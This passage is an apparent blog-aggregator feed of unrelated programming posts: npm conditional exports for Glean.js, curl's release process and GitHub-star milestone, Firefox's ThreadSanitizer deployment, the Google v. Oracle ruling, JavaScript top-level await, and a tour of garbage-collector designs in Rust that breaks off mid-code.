Packages can provide different builds using each module system. In the exports field, Node.js allows packages to define different export paths to be imported depending on the module system a user is relying on. This feature is called “conditional exports”.

Assuming you have gone through all the setup involved in building a hybrid NPM module for both ESM and CommonJS (to learn more about how to do that, refer to this great blog post), this is how our example can be changed to use conditional exports:

  "name": "glean",
  "exports": {
    "./webext": "path/to/entry/point/webext.js",
    "./node": {
      "import": "path/to/entry/point/node.js",
      "require": "path/to/entry/point/node.cjs",
  "typesVersions": {
    "*": {
      "./webext": [ "path/to/types/definitions/webext.d.ts" ],
      "./node": [ "path/to/types/definitions/node.d.ts" ],

The same change is not necessary for the ./webext entry point, because users building for browsers will need to use bundlers such as Webpack and Rollup, which have their own implementation of import/require statement resolutions and are able to import both ESM and CommonJS modules either out-of-the-box or through plugins.

Note that there is also no need to change the typesVersions value for ./node after this change.
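To make the condition lookup concrete, here is a small sketch of the idea (not Node’s actual resolver, which handles far more cases; the paths mirror the example above):

```javascript
// Simplified sketch of conditional-exports resolution.
const exportsField = {
  "./webext": "path/to/entry/point/webext.js",
  "./node": {
    import: "path/to/entry/point/node.js",   // ESM consumers
    require: "path/to/entry/point/node.cjs", // CommonJS consumers
  },
};

// A plain string target applies to every condition; an object picks
// the target matching the consumer's module system.
function resolveEntry(subpath, condition) {
  const target = exportsField[subpath];
  if (typeof target === "string") return target;
  return target ? target[condition] : undefined;
}

console.log(resolveEntry("./node", "require")); // path/to/entry/point/node.cjs
console.log(resolveEntry("./webext", "import")); // path/to/entry/point/webext.js
```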

Final considerations

Although the steps in this post look straightforward enough, it took me quite a while to figure out the correct way to configure Glean.js’ entry points. I encountered many caveats along the way, such as the typesVersions workaround I mentioned above, but also:

  • In order to support ES6 modules, it is necessary to include the filename and extension in all internal package import statements. CommonJS infers the extension and the filename when it is not provided, but ES6 doesn’t. This gets extra weird in Glean.js’ codebase, because Glean.js is in Typescript and all our import statements still have the .js extension. See more discussion about this on this issue and our commit with this change.
  • Webpack, below version 5, does not have support for the exports field and is not able to import a package that defines entry points only using this feature. See the Webpack 5 release notes.
  • Other exports conditions such as browser, production or development are mentioned in the Node.js documentation, but are ultimately ignored by Node.js. They are used by bundlers such as Webpack and Rollup. The Webpack documentation has a comprehensive list of all the conditions you can possibly include in that list, which bundler supports each, and whether Node.js supports it too.

Hope this guide is helpful to other people on the internet. Bye! 👋


Daniel Stenbergsteps to release curl

I have a lot of different hats and roles in the curl project. One of them is “release manager” and in this post I’ve tried to write down pretty much all the steps I do to prepare and ship a curl release at the end of every release cycle in the project.

I’ve handled every curl release so far. All 198 of them. While the process certainly wasn’t this formal or extensive in the beginning, we’ve established a set of steps that have worked fine for us, that have been mostly unchanged for maybe ten years by now.

There’s nothing strange or magic about it. Just a process.

Release cycle

A typical cycle between two releases starts on a Wednesday when we do a release. We always release on Wednesdays. A complete and undisturbed release cycle is always exactly 8 weeks (56 days).

The cycle starts with us taking the remainder of the release week to observe the incoming reports to judge if there’s a need for a follow-up patch release or if we can open up for merging features again.

If no problems significant enough were found in the first few days, we open the “feature window” again on the Monday following the release. Having the feature window open means that we accept new changes and new features getting merged – if anyone submits such a pull-request in a shape ready for merge.

If an issue was found to be important enough to warrant a patch release, we instead schedule a new release date and make the coming cycle really short, without opening the feature window. There aren’t any set rules or guidelines to help us judge this. We play this by ear and go with what feels like the right action for our users.

Closing the feature window

When there’s exactly 4 weeks left to the pending release we close the feature window. This gives us a period where we only merge bug-fixes and all features are put on hold until the window opens again. 28 days to polish off all sharp corners and fix as many problems as we can for the coming release.

Contributors can still submit pull-requests for new stuff and we can review them and polish them, but they will not be merged until the window is reopened. This period is for focusing on bug-fixes.

We have a web page that shows the feature window’s status and I email the mailing list when the status changes.

Slow down

A few days before the pending release we try to slow down and only merge important bug-fixes and maybe hold off the less important ones to reduce risk.

This is a good time to run our copyright.pl script that checks copyright ranges of all files in the git repository and makes sure they are in sync with recent changes. We only update the copyright year ranges of files that we actually changed this year.

Security fixes

If we have pending security fixes to announce in the coming release, those have been worked on in private by the curl security team. Since all our test infrastructure is public we merge our security fixes into the main source code and push them approximately 48 hours before the planned release.

These 48 hours are necessary for CI and automatic build jobs to verify the fixes and still give us time to react to problems this process reveals and the subsequent updates and rinse-repeats etc until everyone is happy. All this testing is done using public code and open infrastructure, which is why we need the code to be pushed for this to work.

At this time we also have detailed security advisories written for each vulnerability that are ready to get published. The advisories are stored in the website repository and have been polished by the curl security team and the reporters of the issues.

Release notes

The release notes for the pending release are a document that we keep in sync and update at regular intervals, so that users have a decent idea of what to expect in the coming release – at all times.

It is basically a matter of running the release-notes.pl script, cleaning up the list of bug-fixes, then running the contributors.sh script to update the list of contributors to the release so far, and committing it all with the proper commit message.

At release-time, the work on the release notes is no different than the regular maintenance of it. Make sure it reflects what’s been done in the code since the previous release.

Tag

When everything is committed to git for the release, I tag the repository. The name and format of the tag is set in stone for historical reasons to be curl-[version] where [version] is the version number with underscores instead of periods. Like curl-7_76_0 for curl 7.76.0. I sign and annotate the tag using git.

git push

Make sure everything is pushed. Git needs the --tags option to push the new tag.

maketgz

Our script that builds a full release tarball is called maketgz. This script is also used to produce the daily snapshots of curl that we provide, and we verify that builds using such tarballs work in the CI.

The output from maketgz is four tarballs. They all have the exact same content, just different compressions and archive formats: gzip, bz2, xz and zip.

The output from this script is the generated release at the point in time of the git tag. The tarballs’ contents are therefore not found (identically) in git (or on GitHub). The release is the output of this script.

Upload

I GPG sign the four tarballs and upload them to the curl site’s download directory. Uploading them takes just a few seconds.

Uploading the packages doesn’t by itself update anything on the site, and they will not be published just because of this. It needs a little more work on the website end.

Edit release on GitHub

Lots of users get their release off GitHub directly, so I make sure to edit the tag there to make it a release and I upload the tarballs there. By providing the release tarballs there, I hope to lower the frequency of users downloading the state of the git repo from the tag, assuming that’s the same thing as a release.

As mentioned above: a true curl release is a signed tarball made with maketgz.

Web site

The curl website at curl.se is managed with the curl-www git repository. The site automatically updates and syncs with the latest git contents.

To get a release done and appear on the website, I update three files on the site. They’re fairly easy to handle:

  1. Makefile contains the latest release version number, release date and the planned date for the next release.
  2. _changes.html is the changelog of changes done per release. The secret to updating this is to build the web site locally and use the generated file dev/release-notes.gen to insert into the changelog. It’s mostly a copy and paste. That generated file is built from the RELEASE-NOTES that’s present in the source code repo.
  3. _newslog.html is used for the “latest news” page on the site. Just mention the new release and link to details.

If there are security advisories for this release, they are also committed to the docs/ directory using their CVE names according to our established standard.

Tag the website

I tag the website repository as well, using the exact same tag name as I did in the source code repository, just to allow us to later get an idea of the shape of the site at the time of this particular release. Even if we don’t really “release” the website.

git push

Using the --tags option again I push the updates to the website with git.

The website, being automatically synced with the git repository, will then very soon get the news about the release, rebuild the necessary pages, and the new release is then out and shown to the world – at least to those who saw the git activity and to visitors of the website. See also the curl website infrastructure.

Now it’s time to share the news to the world via some more channels.

Post blog

I start working on the release blog post perhaps a week before the release. I then work on it on and off and when the release is getting closer I make sure to tie all loose ends and finalize it.

Recently I’ve also created a new “release image” for the particular curl release I do so if I feel inspired I do that too. I’m not really skilled or talented enough for that, but I like the idea of having a picture for this unique release – to use in the blog post and elsewhere when talking about this version. Even if that’s a very ephemeral thing as this specific version very soon appears in my rear view mirror only…

Email announcements

Perhaps the most important release announcement is done per email. I inform curl-users, curl-library and curl-announce about it.

If there are security advisories to announce in association with the release, those are also sent individually to the same mailing lists and the oss-security mailing list.

Tweet about it

I’m fortunate enough to have a lot of twitter friends and followers so I also make sure they get to know about the new release. Follow me there to get future tweets.

Video presentation

On the day of the release I do a live-streamed presentation of it on Twitch.

I create a small slide set and go through basically the same things I mention in my release blog post: security issues, new features and a look at some bug-fixes we did for this release that I find interesting or note-worthy.

Once it is streamed, recorded and published on YouTube, I update my release blog post to embed the presentation, and I add a link to it on the changelog page on the curl website.

A post-release relief

Immediately after having done all the steps for a release, when it’s uploaded, published, announced, discussed and presented, I can take a moment to lean back and enjoy it.

I then often experience a sense of calmness and relaxation. I get an extra cup of coffee, put my feet up and just go… aaaah. Before any new bugs have arrived, when the slate is still clean, so to speak. That’s a mighty fine moment and I cherish it.

It never lasts very long. I finish that coffee, get my feet down again and get back to work. There are pull requests to review that might soon be ready for merge when the feature window opens and there are things left to fix that we didn’t get to in this past release that would be awesome to have done in the next!

Can we open the feature window again on the coming Monday?


Coffee Image by Karolina Grabowska from Pixabay

This Week In RustThis Week in Rust 385

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

No papers/research projects this week.

Project/Tooling Updates
Rust Walkthroughs

Crate of the Week

This week's crate is rs-pbrt, a counterpart to the PBRT book's (3rd edition) C++ code.

Thanks to Jan Walter for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

313 pull requests were merged in the last week

Rust Compiler Performance Triage

A pretty major week for memory usage improvements with an average of ~20% gains on memory usage for release builds, and 5% on check builds, due to an update in the default allocator used (to a more recent jemalloc). Wall time performance remained largely unchanged over this week.

Triage done by @simulacrum. Revision range: 4896450e..d32238

1 Regressions, 4 Improvements, 0 Mixed

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

Tracking Issues & PRs

New RFCs

Upcoming Events

North America
Asia Pacific

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

IOTA Foundation

Parity Technologies



Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Sadly there was no quote nominated for this week.

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Niko MatsakisAsync Vision Doc Writing Sessions IV

My week is very scheduled, so I am not able to host any public drafting sessions this week – however, Ryan Levick will be hosting two sessions!

When – Who – Topic
Thu at 07:00 ET – Ryan – The need for Async Traits
Fri at 07:00 ET – Ryan – Challenges from cancellation

If you’re available and those stories sound like something that interests you, please join him! Just ping me or Ryan on Discord or Zulip and we’ll send you the Zoom link. If you’ve already joined a previous session, the link is the same as before.

Sneak peek: Next week

Next week, we will be holding more vision doc writing sessions. We are now going to expand the scope to go beyond “status quo” stories and cover “shiny future” stories as well. Keep your eyes peeled for a post on the Rust blog and further updates!

The vision…what?

Never heard of the async vision doc? It’s a new thing we’re trying as part of the Async Foundations Working Group:

We are launching a collaborative effort to build a shared vision document for Async Rust. Our goal is to engage the entire community in a collective act of the imagination: how can we make the end-to-end experience of using Async I/O not only a pragmatic choice, but a joyful one?

Read the full blog post for more.

Daniel Stenberg20,000 github stars

In September 2018 I celebrated 10,000 stars, up from 5,000 back in May 2017. We made 1,000 stars on August 12, 2014.

Today I’m cheering for the 20,000 stars curl has received on GitHub.

It is worth repeating that this is just a number without any particular meaning or importance. It just means 20,000 GitHub users clicked the star symbol for the curl project over at curl/curl.

At exactly 08:15:23 UTC today we reached this milestone. Checked with a curl command line like this:

$ curl -s https://api.github.com/repos/curl/curl | jq '.stargazers_count'

(By the time I get around to finalizing this post, the count has already gone up to 20087…)

To celebrate this occasion, I decided I was worth a beer and this time I went with a hand-written note. The beer was a Swedish hazy IPA called Amazing Haze from the brewery Stigbergets. One of my current favorites.

Photos from previous GitHub-star celebrations:

Hacks.Mozilla.OrgEliminating Data Races in Firefox – A Technical Report

We successfully deployed ThreadSanitizer in the Firefox project to eliminate data races in our remaining C/C++ components. In the process, we found several impactful bugs and can safely say that data races are often underestimated in terms of their impact on program correctness. We recommend that all multithreaded C/C++ projects adopt the ThreadSanitizer tool to enhance code quality.

What is ThreadSanitizer?

ThreadSanitizer (TSan) is compile-time instrumentation to detect data races according to the C/C++ memory model on Linux. It is important to note that these data races are considered undefined behavior within the C/C++ specification. As such, the compiler is free to assume that data races do not happen and perform optimizations under that assumption. Detecting bugs resulting from such optimizations can be hard, and data races often have an intermittent nature due to thread scheduling.

Without a tool like ThreadSanitizer, even the most experienced developers can spend hours on locating such a bug. With ThreadSanitizer, you get a comprehensive data race report that often contains all of the information needed to fix the problem.

An example of a ThreadSanitizer report, showing where each thread is reading/writing, the location they both access, and where the threads were created (output shortened for the article).

One important property of TSan is that, when properly deployed, the data race detection does not produce false positives. This is incredibly important for tool adoption, as developers quickly lose faith in tools that produce uncertain results.

Like other sanitizers, TSan is built into Clang and can be used with any recent Clang/LLVM toolchain. If your C/C++ project already uses e.g. AddressSanitizer (which we also highly recommend), deploying ThreadSanitizer will be very straightforward from a toolchain perspective.

Challenges in Deployment

Benign vs. Impactful Bugs

Despite ThreadSanitizer being a very well designed tool, we had to overcome a variety of challenges at Mozilla during the deployment phase. The most significant issue we faced was that it is really difficult to prove that data races are actually harmful at all and that they impact the everyday use of Firefox. In particular, the term “benign” came up often. Benign data races acknowledge that a particular data race is actually a race, but assume that it does not have any negative side effects.

While benign data races do exist, we found (in agreement with previous work on this subject [1] [2]) that data races are very easily misclassified as benign. The reasons for this are clear: It is hard to reason about what compilers can and will optimize, and confirmation for certain “benign” data races requires you to look at the assembler code that the compiler finally produces.

Needless to say, this procedure is often much more time consuming than fixing the actual data race and also not future-proof. As a result, we decided that the ultimate goal should be a “no data races” policy that declares even benign data races as undesirable due to their risk of misclassification, the required time for investigation and the potential risk from future compilers (with better optimizations) or future platforms (e.g. ARM).

However, it was clear that establishing such a policy would require a lot of work, both on the technical side as well as in convincing developers and management. In particular, we could not expect a large amount of resources to be dedicated to fixing data races with no clear product impact. This is where TSan’s suppression list came in handy:

We knew we had to stop the influx of new data races but at the same time get the tool usable without fixing all legacy issues. The suppression list (in particular the version compiled into Firefox) allowed us to temporarily ignore data races once we had them on file and ultimately bring up a TSan build of Firefox in CI that would automatically avoid further regressions. Of course, security bugs required specialized handling, but were usually easy to recognize (e.g. racing on non-thread safe pointers) and were fixed quickly without suppressions.

To help us understand the impact of our work, we maintained an internal list of all the most serious races that TSan detected (ones that had side-effects or could cause crashes). This data helped convince developers that the tool was making their lives easier while also clearly justifying the work to management.

In addition to this qualitative data, we also decided for a more quantitative approach: We looked at all the bugs we found over a year and how they were classified. Of the 64 bugs we looked at, 34% were classified as “benign” and 22% were “impactful” (the rest hadn’t been classified).

We knew there was a certain amount of misclassified benign issues to be expected, but what we really wanted to know was: Do benign issues pose a risk to the project? Assuming that all of these issues truly had no impact on the product, are we wasting a lot of resources on fixing them? Thankfully, we found that the majority of these fixes were trivial and/or improved code quality.

The trivial fixes were mostly turning non-atomic variables into atomics (20%), adding permanent suppressions for upstream issues that we couldn’t address immediately (15%), or removing overly complicated code (20%). Only 45% of the benign fixes actually required some sort of more elaborate patch (as in, the diff was larger than just a few lines of code and did not just remove code).

We concluded that benign issues were not a major resource sink, and that their cost was well acceptable for the overall gains that the project provided.

False Positives?

As mentioned in the beginning, TSan does not produce false positive data race reports when properly deployed, which includes instrumenting all code that is loaded into the process and avoiding primitives that TSan doesn’t understand (such as atomic fences). For most projects these conditions are trivial, but larger projects like Firefox require a bit more work. Thankfully this work largely amounted to a few lines in TSan’s robust suppression system.

Instrumenting all code in Firefox isn’t currently possible because it needs to use shared system libraries like GTK and X11. Fortunately, TSan offers the “called_from_lib” feature that can be used in the suppression list to ignore any calls originating from those shared libraries. Our other major source of uninstrumented code was build flags not being properly passed around, which was especially problematic for Rust code (see the Rust section below).

As for unsupported primitives, the only issue we ran into was the lack of support for fences. Most fences were the result of a standard atomic reference counting idiom which could be trivially replaced with an atomic load in TSan builds. Unfortunately, fences are fundamental to the design of the crossbeam crate (a foundational concurrency library in Rust), and the only solution for this was a suppression.

We also found that there is a (well known) false positive in deadlock detection that is however very easy to spot and also does not affect data race detection/reporting at all. In a nutshell, any deadlock report that only involves a single thread is likely this false positive.

The only true false positive we found so far turned out to be a rare bug in TSan and was fixed in the tool itself. However, developers claimed on various occasions that a particular report must be a false positive. In all of these cases, it turned out that TSan was indeed right and the problem was just very subtle and hard to understand. This is again confirming that we need tools like TSan to help us eliminate this class of bugs.

Interesting Bugs

Currently, the TSan bug-o-rama contains around 20 bugs. We’re still working on fixes for some of these bugs and would like to point out several particularly interesting/impactful ones.

Beware Bitfields

Bitfields are a handy little convenience to save space when storing lots of different small values. For instance, rather than having 30 bools taking up 30 bytes, they can all be packed into the bits of 4 bytes. For the most part this works fine, but it has one nasty consequence: different pieces of data now alias. This means that accessing “neighboring” bitfields is actually accessing the same memory, and therefore a potential data race.

In practical terms, this means that if two threads are writing to two neighboring bitfields, one of the writes can get lost, as both of those writes are actually read-modify-write operations of all the bitfields.

If you’re familiar with bitfields and actively thinking about them, this might be obvious, but when you’re just saying myVal.isInitialized = true you may not think about or even realize that you’re accessing a bitfield.

We have had many instances of this problem, but let’s look at bug 1601940 and its race report.

When we first saw this report, it was puzzling because the two threads in question touch different fields (mAsyncTransformAppliedToContent vs. mTestAttributeAppliers). However, as it turns out, these two fields are both adjacent bitfields in the class.

This was causing intermittent failures in our CI and cost a maintainer of this code valuable time. We find this bug particularly interesting because it demonstrates how hard it is to diagnose data races without appropriate tooling and we found more instances of this type of bug (racy bitfield write/write) in our codebase. One of the other instances even had the potential to cause network loads to supply invalid cache content, another hard-to-debug situation, especially when it is intermittent and therefore not easily reproducible.

We encountered this enough that we eventually introduced a MOZ_ATOMIC_BITFIELDS macro that generates bitfields with atomic load/store methods. This allowed us to quickly fix problematic bitfields for the maintainers of each component without having to redesign their types.

Oops That Wasn’t Supposed To Be Multithreaded

We also found several instances of components which were explicitly designed to be single-threaded accidentally being used by multiple threads, such as in bug 1681950.

The race itself here is rather simple, we are racing on the same file through stat64 and understanding the report was not the problem this time. However, as can be seen from frame 10, this call originates from the PreferencesWriter, which is responsible for writing changes to the prefs.js file, the central storage for Firefox preferences.

It was never intended for this to be called on multiple threads at the same time and we believe that this had the potential to corrupt the prefs.js file. As a result, during the next startup the file would fail to load and be discarded (reset to default prefs). Over the years, we’ve had quite a few bug reports related to this file magically losing its custom preferences but we were never able to find the root cause. We now believe that this bug is at least partially responsible for these losses.

We think this is a particularly good example of a failure for two reasons: it was a race that had more harmful effects than just a crash, and it caught a larger logic error of something being used outside of its original design parameters.

Late-Validated Races

On several occasions we encountered a pattern that lies on the boundary of benign and that we think merits some extra attention: intentionally racily reading a value, but then later doing checks that properly validate it before use.

See for example, this instance we encountered in SQLite.

Please Don’t Do This. These patterns are really fragile and they’re ultimately undefined behavior, even if they generally work right. Just write proper atomic code — you’ll usually find that the performance is perfectly fine.

What about Rust?

Another difficulty that we had to solve during TSan deployment was due to part of our codebase now being written in Rust, which has much less mature support for sanitizers. This meant that we spent a significant portion of our bringup with all Rust code suppressed while that tooling was still being developed.

We weren’t particularly concerned with our Rust code having a lot of races, but rather races in C++ code being obfuscated by passing through Rust. In fact, we strongly recommend writing new projects entirely in Rust to avoid data races altogether.

The hardest part in particular is the need to rebuild the Rust standard library with TSan instrumentation. On nightly there is an unstable feature, -Zbuild-std, that lets us do exactly that, but it still has a lot of rough edges.

Our biggest hurdle with build-std was that it’s currently incompatible with vendored build environments, which Firefox uses. Fixing this isn’t simple because cargo’s tools for patching in dependencies aren’t designed for affecting only a subgraph (i.e. just std and not your own code). So far, we have mitigated this by maintaining a small set of patches on top of rustc/cargo which implement this well-enough for Firefox but need further work to go upstream.

But with build-std hacked into working for us we were able to instrument our Rust code and were happy to find that there were very few problems! Most of the things we discovered were C++ races that happened to pass through some Rust code and had therefore been hidden by our blanket suppressions.

We did however find two pure Rust races:

The first was bug 1674770, which was a bug in the parking_lot library. This Rust library provides synchronization primitives and other concurrency tools and is written and maintained by experts. We did not investigate the impact but the issue was a couple atomic orderings being too weak and was fixed quickly by the authors. This is yet another example that proves how difficult it is to write bug-free concurrent code.

The second was bug 1686158, which was some code in WebRender’s software OpenGL shim. They were maintaining some hand-rolled shared-mutable state using raw atomics for part of the implementation but forgot to make one of the fields atomic. This was easy enough to fix.

Overall Rust appears to be fulfilling one of its original design goals: allowing us to write more concurrent code safely. Both WebRender and Stylo are very large and pervasively multi-threaded, but have had minimal threading issues. What issues we did find were mistakes in the implementations of low-level and explicitly unsafe multithreading abstractions — and those mistakes were simple to fix.

This is in contrast to many of our C++ races, which often involved things being randomly accessed on different threads with unclear semantics, necessitating non-trivial refactorings of the code.

Conclusion

Data races are an underestimated problem. Due to their complexity and intermittency, we often struggle to identify them, locate their cause and judge their impact correctly. In many cases, this is also a time-consuming process, wasting valuable resources. ThreadSanitizer has proven to be not just effective in locating data races and providing adequate debug information, but also to be practical even on a project as large as Firefox.

Acknowledgements

We would like to thank the authors of ThreadSanitizer for providing the tool and in particular Dmitry Vyukov (Google) for helping us with some complex, Firefox-specific edge cases during deployment.

The post Eliminating Data Races in Firefox – A Technical Report appeared first on Mozilla Hacks - the Web developer blog.

Andrew HalberstadtA Better Replacement for ls

If it ain’t broke don’t fix it.

This old adage is valuable advice that has been passed down through generations. But it hasn’t stopped these people from rewriting command line tools perfected 30+ years ago in Rust.

This week we’ll take a quick look at exa, a replacement for ls. So why should you ignore the wise advice from the adage and replace ls? Because there are marginal improvements to be had, duh! Although the improvements in this case are far from marginal.

The Mozilla BlogSoftware Innovation Prevails in Landmark Supreme Court Ruling in Google v. Oracle

In an important victory for software developers, the Supreme Court ruled today that reimplementing an API is fair use under US copyright law. The Court’s reasoning should apply to all cases where developers reimplement an API, to enable interoperability, or to allow developers to use familiar commands. This resolves years of uncertainty, and will enable more competition and follow-on innovation in software.

Yes you would – Credit: Parker Higgins (https://twitter.com/XOR)

This ruling arrives after more than ten years of litigation, including two trials and two appellate rulings from the Federal Circuit. Mozilla, together with other amici, filed several briefs throughout this time because we believed the rulings were at odds with how software is developed, and could hinder the industry. Fortunately, in a 6-2 decision authored by Justice Breyer, the Supreme Court overturned the Federal Circuit’s error.

When the case reached the Supreme Court, Mozilla filed an amicus brief arguing that APIs should not be copyrightable or, alternatively, reimplementation of APIs should be covered by fair use. The Court took the second of these options:

We reach the conclusion that in this case, where Google reimplemented a user interface, taking only what was needed to allow users to put their accrued talents to work in a new and transformative program, Google’s copying of the Sun Java API was a fair use of that material as a matter of law.

In reaching his conclusion, Justice Breyer noted that reimplementing an API “can further the development of computer programs.” This is because it enables programmers to use their knowledge and skills to build new software. The value of APIs is not so much in the creative content of the API itself (e.g. whether a particular API is “Java.lang.Math.max” or, as the Federal Circuit once suggested as an alternative, “Java.lang.Arith.Larger”) but in the acquired experience of the developer community that uses it.

We are pleased that the Supreme Court has reached this decision and that copyright will no longer stand in the way of software developers reimplementing APIs in socially, technologically, and economically beneficial ways.

The post Software Innovation Prevails in Landmark Supreme Court Ruling in Google v. Oracle appeared first on The Mozilla Blog.

Spidermonkey Development BlogTop Level Await Ships with Firefox 89

Firefox will ship Top Level Await by default starting in Firefox 89. This new feature adds a capability to modules that allows programmers to do asynchronous work, such as fetching data, directly at the top level of any module.

For example, if you want to instantiate your file with some custom data, you can now do this:

import process from "./api.js";

const response = await fetch("./data.json");
const parsedData = await response.json();

export default process(parsedData);

This is much simpler and more robust than previous solutions, such as:

import { process } from "./some-module.mjs";
let output;
async function main() {
  const response = await fetch("./data.json");
  const parsedData = await response.json();
  output = process(parsedData);
}
main();
export { output };

… in which case, any consumer of this module would need to check when the output variable is bound.

If you are curious about this proposal, you can read more about it in the explainer. The proposal is currently at stage 3, but we have high confidence in it going to stage 4.

Happy Hacking!

The Firefox FrontierMozilla Explains: Cookies and supercookies

Every time you visit a website and it seems to remember you, that’s a cookie at work. You might have heard that all cookies are bad, but reality is a … Read more

The post Mozilla Explains: Cookies and supercookies appeared first on The Firefox Frontier.

Manish GoregaokarA Tour of Safe Tracing GC Designs in Rust

I’ve been thinking about garbage collection in Rust for a long time, ever since I started working on Servo’s JS layer. I’ve designed a GC library, worked on GC integration ideas for Rust itself, worked on Servo’s JS GC integration, and helped out with a couple other GC projects in Rust.

As a result, I tend to get pulled into GC discussions fairly often. I enjoy talking about GCs – don’t get me wrong – but I often end up going over the same stuff. Being lazy I’d much prefer to be able to refer people to a single place where they can get up to speed on the general space of GC design, after which it’s possible to have more in depth discussions about the specific tradeoffs necessary.

I’ll note that some of the GCs in this post are experiments or unmaintained. The goal of this post is to showcase these as examples of design, not necessarily general-purpose crates you may wish to use, though some of them are usable crates as well.

A note on terminology

A thing that often muddles discussions about GCs is that according to some definition of “GC”, simple reference counting is a GC. Typically the definition of GC used in academia broadly refers to any kind of automatic memory management. However, most programmers familiar with the term “GC” will usually liken it to “what Java, Go, Haskell, and C# do”, which can be unambiguously referred to as tracing garbage collection.

Tracing garbage collection is the kind which keeps track of which heap objects are directly reachable (“roots”), figures out the whole set of reachable heap objects (“tracing”, also, “marking”), and then cleans them up (“sweeping”).

Throughout this blog post I will use the term “GC” to refer to tracing garbage collection/collectors unless otherwise stated1.

Why write GCs for Rust?

(If you already want to write a GC in Rust and are reading this post to get ideas for how, you can skip this section. You already know why someone would want to write a GC for Rust)

Every time this topic is brought up someone will inevitably go “I thought the point of Rust was to avoid GCs” or “GCs will ruin Rust” or something. As a general rule it’s good to not give too much weight to the comments section, but I think it’s useful to explain why someone may wish for GC-like semantics in Rust.

There are really two distinct kinds of use cases. Firstly, sometimes you need to manage memory with cycles and Rc<T> is inadequate for the job since Rc-cycles get leaked. petgraph or an arena are often acceptable solutions for this kind of pattern, but not always, especially if your data is super heterogeneous. This kind of thing crops up often when dealing with concurrent datastructures; for example crossbeam has an epoch-based memory management system which, while not a full tracing GC, has a lot of characteristics in common with GCs.

For this use case it’s rarely necessary to design a custom GC, you can look for a reusable crate like gc 2.

The second case is far more interesting in my experience, and since it cannot be solved by off-the-shelf solutions tends to crop up more often: integration with (or implementation of) programming languages that do use a garbage collector. Servo needs to do this for integrating with the Spidermonkey JS engine and luster needed to do this for implementing the GC of its Lua VM. boa, a pure Rust JS runtime, uses the gc crate to back its garbage collector.

Sometimes when integrating with a GCd language you can get away with not needing to implement a full garbage collector: JNI does this; while C++ does not have native garbage collection, JNI gets around this by simply “rooting” (we’ll cover what that means in a bit) anything that crosses over to the C++ side3. This is often fine!

The downside of this is that every interaction with objects managed by the GC has to go through an API call; you can’t “embed” efficient Rust/C++ objects in the GC with ease. For example, in browsers most DOM types (e.g. Element) are implemented in native code; and need to be able to contain references to other native GC’d types (it should be possible to inspect the children of a Node without needing to call back into the JavaScript engine).

So sometimes you need to be able to integrate with a GC from a runtime; or even implement your own GC if you are writing a runtime that needs one. In both of these cases you typically want to be able to safely manipulate GC’d objects from Rust code, and even directly put Rust types on the GC heap.

Why are GCs in Rust hard?

In one word: Rooting. In a garbage collector, the objects “directly” in use on the stack are the “roots”, and you need to be able to identify them. Here, when I say “directly”, I mean “accessible without having to go through other GC’d objects”, so putting an object inside a Vec<T> does not make it stop being a root, but putting it inside some other GC’d object does.

Unfortunately, Rust doesn’t really have a concept of “directly on the stack”:

struct Foo {
    bar: Option<Gc<Bar>>
}

// this is a root
let bar = Gc::new(Bar::new());
// this is also a root
let foo = Gc::new(Foo::new());
// bar should no longer be a root (but we can't detect that!)
foo.bar = Some(bar);
// but foo should still be a root here since it's not inside
// another GC'd object
let v = vec![foo];

Rust’s ownership system actually makes it easier to have fewer roots since it’s relatively easy to state that taking &T of a GC’d object doesn’t need to create a new root, and let Rust’s ownership system sort it out, but being able to distinguish between “directly owned” and “indirectly owned” is super tricky.

Another aspect of this is that garbage collection is really a moment of global mutation – the garbage collector reads through the heap and then deletes some of the objects there. This is a moment of the rug being pulled out from under your feet. Rust’s entire design is predicated on such rug-pulling being very very bad and not to be allowed, so this can be a bit problematic. This isn’t as bad as it may initially sound because after all the rug-pulling is mostly just cleaning up unreachable objects, but it does crop up a couple times when fitting things together, especially around destructors and finalizers4. Rooting would be far easier if, for example, you were able to declare areas of code where “no GC can happen”5 so you can tightly scope the rug-pulling and have to worry less about roots.

Destructors and finalizers

It’s worth calling out destructors in particular. A huge problem with custom destructors on GCd types is that the custom destructor totally can stash itself away into a long-lived reference during garbage collection, leading to a dangling reference:

struct LongLived {
    dangle: RefCell<Option<Gc<CantKillMe>>>
}

struct CantKillMe {
    // set up to point to itself during construction
    self_ref: RefCell<Option<Gc<CantKillMe>>>,
    long_lived: Gc<LongLived>
}

impl Drop for CantKillMe {
    fn drop(&mut self) {
        // attach self to long_lived
        *self.long_lived.dangle.borrow_mut() = Some(self.self_ref.borrow().clone().unwrap());
    }
}

let long = Gc::new(LongLived::new());
{
    let cant = Gc::new(CantKillMe::new());
    *cant.self_ref.borrow_mut() = Some(cant.clone());
    // cant goes out of scope, CantKillMe::drop is run
    // cant is attached to long_lived.dangle but still cleaned up
}

// Dangling reference!
let dangling = long.dangle.borrow().unwrap();

The most common solution here is to disallow destructors on types that use #[derive(Trace)], which can be done by having the custom derive generate a Drop implementation, or have it generate something which causes a conflicting type error.

You can additionally provide a Finalize trait that has different semantics: the GC calls it while cleaning up GC objects, but it may be called multiple times or not at all. This kind of thing is typical in GCs outside of Rust as well.
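The Drop-blocking trick plus a Finalize trait can be sketched roughly as follows (all names and shapes here are illustrative, not any particular crate's API): the custom derive generates its own impl Drop, so a user-written Drop on the same type becomes a conflicting-implementation compile error, while Finalize remains available for best-effort cleanup.

```rust
use std::sync::atomic::{AtomicUsize, Ordering};

// counts finalizations, just so the sketch is observable
static FINALIZED: AtomicUsize = AtomicUsize::new(0);

trait Finalize {
    // May be called multiple times or not at all by the collector,
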